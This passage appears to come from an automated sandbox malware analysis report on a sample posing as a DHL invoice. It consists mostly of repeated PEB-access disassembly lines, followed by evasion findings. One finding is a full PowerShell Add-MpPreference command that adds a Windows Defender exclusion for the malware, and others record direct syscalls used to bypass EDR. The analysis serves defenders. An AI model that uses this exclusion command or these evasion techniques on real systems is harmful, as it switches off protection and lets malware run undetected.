            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574ADE0 mov eax, dword ptr fs:[00000030h]4_2_0574ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574ADE0 mov eax, dword ptr fs:[00000030h]4_2_0574ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574ADE0 mov eax, dword ptr fs:[00000030h]4_2_0574ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574ADE0 mov eax, dword ptr fs:[00000030h]4_2_0574ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574ADE0 mov eax, dword ptr fs:[00000030h]4_2_0574ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574ADE0 mov eax, dword ptr fs:[00000030h]4_2_0574ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05760DE1 mov eax, dword ptr fs:[00000030h]4_2_05760DE1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573CDEA mov eax, dword ptr fs:[00000030h]4_2_0573CDEA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573CDEA mov eax, dword ptr fs:[00000030h]4_2_0573CDEA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576EDD3 mov eax, dword ptr fs:[00000030h]4_2_0576EDD3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576EDD3 mov eax, dword ptr fs:[00000030h]4_2_0576EDD3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C4DD7 mov eax, dword ptr fs:[00000030h]4_2_057C4DD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C4DD7 mov eax, dword ptr fs:[00000030h]4_2_057C4DD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577CDB1 mov ecx, dword ptr fs:[00000030h]4_2_0577CDB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577CDB1 mov eax, dword ptr fs:[00000030h]4_2_0577CDB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577CDB1 mov eax, dword ptr fs:[00000030h]4_2_0577CDB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05768DBF mov eax, dword ptr fs:[00000030h]4_2_05768DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05768DBF mov eax, dword ptr fs:[00000030h]4_2_05768DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05776DA0 mov eax, dword ptr fs:[00000030h]4_2_05776DA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574AC50 mov eax, dword ptr fs:[00000030h]4_2_0574AC50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574AC50 mov eax, dword ptr fs:[00000030h]4_2_0574AC50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574AC50 mov eax, dword ptr fs:[00000030h]4_2_0574AC50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574AC50 mov eax, dword ptr fs:[00000030h]4_2_0574AC50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574AC50 mov eax, dword ptr fs:[00000030h]4_2_0574AC50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574AC50 mov eax, dword ptr fs:[00000030h]4_2_0574AC50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746C50 mov eax, dword ptr fs:[00000030h]4_2_05746C50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746C50 mov eax, dword ptr fs:[00000030h]4_2_05746C50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746C50 mov eax, dword ptr fs:[00000030h]4_2_05746C50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05774C59 mov eax, dword ptr fs:[00000030h]4_2_05774C59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4C34 mov eax, dword ptr fs:[00000030h]4_2_057E4C34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4C34 mov eax, dword ptr fs:[00000030h]4_2_057E4C34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4C34 mov eax, dword ptr fs:[00000030h]4_2_057E4C34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4C34 mov eax, dword ptr fs:[00000030h]4_2_057E4C34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4C34 mov eax, dword ptr fs:[00000030h]4_2_057E4C34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4C34 mov eax, dword ptr fs:[00000030h]4_2_057E4C34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4C34 mov ecx, dword ptr fs:[00000030h]4_2_057E4C34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573EC20 mov eax, dword ptr fs:[00000030h]4_2_0573EC20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057DCC20 mov eax, dword ptr fs:[00000030h]4_2_057DCC20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057DCC20 mov eax, dword ptr fs:[00000030h]4_2_057DCC20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C4C0F mov eax, dword ptr fs:[00000030h]4_2_057C4C0F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750C00 mov eax, dword ptr fs:[00000030h]4_2_05750C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750C00 mov eax, dword ptr fs:[00000030h]4_2_05750C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750C00 mov eax, dword ptr fs:[00000030h]4_2_05750C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750C00 mov eax, dword ptr fs:[00000030h]4_2_05750C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577CC00 mov eax, dword ptr fs:[00000030h]4_2_0577CC00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05772CF0 mov eax, dword ptr fs:[00000030h]4_2_05772CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05772CF0 mov eax, dword ptr fs:[00000030h]4_2_05772CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05772CF0 mov eax, dword ptr fs:[00000030h]4_2_05772CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05772CF0 mov eax, dword ptr fs:[00000030h]4_2_05772CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573CCC8 mov eax, dword ptr fs:[00000030h]4_2_0573CCC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05768CB1 mov eax, dword ptr fs:[00000030h]4_2_05768CB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05768CB1 mov eax, dword ptr fs:[00000030h]4_2_05768CB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BCCA0 mov ecx, dword ptr fs:[00000030h]4_2_057BCCA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BCCA0 mov eax, dword ptr fs:[00000030h]4_2_057BCCA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BCCA0 mov eax, dword ptr fs:[00000030h]4_2_057BCCA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BCCA0 mov eax, dword ptr fs:[00000030h]4_2_057BCCA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05738C8D mov eax, dword ptr fs:[00000030h]4_2_05738C8D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576AF69 mov eax, dword ptr fs:[00000030h]4_2_0576AF69
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576AF69 mov eax, dword ptr fs:[00000030h]4_2_0576AF69
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573CF50 mov eax, dword ptr fs:[00000030h]4_2_0573CF50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573CF50 mov eax, dword ptr fs:[00000030h]4_2_0573CF50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573CF50 mov eax, dword ptr fs:[00000030h]4_2_0573CF50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573CF50 mov eax, dword ptr fs:[00000030h]4_2_0573CF50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573CF50 mov eax, dword ptr fs:[00000030h]4_2_0573CF50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573CF50 mov eax, dword ptr fs:[00000030h]4_2_0573CF50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577CF50 mov eax, dword ptr fs:[00000030h]4_2_0577CF50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E0F50 mov eax, dword ptr fs:[00000030h]4_2_057E0F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C4F40 mov eax, dword ptr fs:[00000030h]4_2_057C4F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C4F40 mov eax, dword ptr fs:[00000030h]4_2_057C4F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C4F40 mov eax, dword ptr fs:[00000030h]4_2_057C4F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C4F40 mov eax, dword ptr fs:[00000030h]4_2_057C4F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4F42 mov eax, dword ptr fs:[00000030h]4_2_057E4F42
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576EF28 mov eax, dword ptr fs:[00000030h]4_2_0576EF28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05742F12 mov eax, dword ptr fs:[00000030h]4_2_05742F12
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05814FE7 mov eax, dword ptr fs:[00000030h]4_2_05814FE7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577CF1F mov eax, dword ptr fs:[00000030h]4_2_0577CF1F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F6F00 mov eax, dword ptr fs:[00000030h]4_2_057F6F00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F6FF7 mov eax, dword ptr fs:[00000030h]4_2_057F6FF7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05780FF6 mov eax, dword ptr fs:[00000030h]4_2_05780FF6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05780FF6 mov eax, dword ptr fs:[00000030h]4_2_05780FF6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05780FF6 mov eax, dword ptr fs:[00000030h]4_2_05780FF6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05780FF6 mov eax, dword ptr fs:[00000030h]4_2_05780FF6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573EFD8 mov eax, dword ptr fs:[00000030h]4_2_0573EFD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573EFD8 mov eax, dword ptr fs:[00000030h]4_2_0573EFD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573EFD8 mov eax, dword ptr fs:[00000030h]4_2_0573EFD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05742FC8 mov eax, dword ptr fs:[00000030h]4_2_05742FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05742FC8 mov eax, dword ptr fs:[00000030h]4_2_05742FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05742FC8 mov eax, dword ptr fs:[00000030h]4_2_05742FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05742FC8 mov eax, dword ptr fs:[00000030h]4_2_05742FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05814F68 mov eax, dword ptr fs:[00000030h]4_2_05814F68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05772F98 mov eax, dword ptr fs:[00000030h]4_2_05772F98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05772F98 mov eax, dword ptr fs:[00000030h]4_2_05772F98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577CF80 mov eax, dword ptr fs:[00000030h]4_2_0577CF80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C0E7F mov eax, dword ptr fs:[00000030h]4_2_057C0E7F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C0E7F mov eax, dword ptr fs:[00000030h]4_2_057C0E7F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C0E7F mov eax, dword ptr fs:[00000030h]4_2_057C0E7F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746E71 mov eax, dword ptr fs:[00000030h]4_2_05746E71
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D6E20 mov eax, dword ptr fs:[00000030h]4_2_057D6E20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D6E20 mov eax, dword ptr fs:[00000030h]4_2_057D6E20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D6E20 mov ecx, dword ptr fs:[00000030h]4_2_057D6E20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05738E1D mov eax, dword ptr fs:[00000030h]4_2_05738E1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]4_2_0576AE00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]4_2_0576AE00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]4_2_0576AE00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576AE00 mov ecx, dword ptr fs:[00000030h]4_2_0576AE00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]4_2_0576AE00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]4_2_0576AE00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]4_2_0576AE00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]4_2_0576AE00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]4_2_0576AE00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]4_2_0576AE00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05778EF5 mov eax, dword ptr fs:[00000030h]4_2_05778EF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746EE0 mov eax, dword ptr fs:[00000030h]4_2_05746EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746EE0 mov eax, dword ptr fs:[00000030h]4_2_05746EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746EE0 mov eax, dword ptr fs:[00000030h]4_2_05746EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746EE0 mov eax, dword ptr fs:[00000030h]4_2_05746EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057DAEB0 mov eax, dword ptr fs:[00000030h]4_2_057DAEB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057DAEB0 mov eax, dword ptr fs:[00000030h]4_2_057DAEB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05812E4F mov eax, dword ptr fs:[00000030h]4_2_05812E4F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05812E4F mov eax, dword ptr fs:[00000030h]4_2_05812E4F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057CCEA0 mov eax, dword ptr fs:[00000030h]4_2_057CCEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057CCEA0 mov eax, dword ptr fs:[00000030h]4_2_057CCEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057CCEA0 mov eax, dword ptr fs:[00000030h]4_2_057CCEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573AE90 mov eax, dword ptr fs:[00000030h]4_2_0573AE90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573AE90 mov eax, dword ptr fs:[00000030h]4_2_0573AE90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573AE90 mov eax, dword ptr fs:[00000030h]4_2_0573AE90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05772E9C mov eax, dword ptr fs:[00000030h]4_2_05772E9C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05772E9C mov ecx, dword ptr fs:[00000030h]4_2_05772E9C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057CC97C mov eax, dword ptr fs:[00000030h]4_2_057CC97C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4978 mov eax, dword ptr fs:[00000030h]4_2_057E4978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4978 mov eax, dword ptr fs:[00000030h]4_2_057E4978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05766962 mov eax, dword ptr fs:[00000030h]4_2_05766962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05766962 mov eax, dword ptr fs:[00000030h]4_2_05766962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05766962 mov eax, dword ptr fs:[00000030h]4_2_05766962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0578096E mov eax, dword ptr fs:[00000030h]4_2_0578096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0578096E mov edx, dword ptr fs:[00000030h]4_2_0578096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0578096E mov eax, dword ptr fs:[00000030h]4_2_0578096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C0946 mov eax, dword ptr fs:[00000030h]4_2_057C0946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580A9D3 mov eax, dword ptr fs:[00000030h]4_2_0580A9D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C892A mov eax, dword ptr fs:[00000030h]4_2_057C892A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D892B mov eax, dword ptr fs:[00000030h]4_2_057D892B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05738918 mov eax, dword ptr fs:[00000030h]4_2_05738918
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -ForceJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
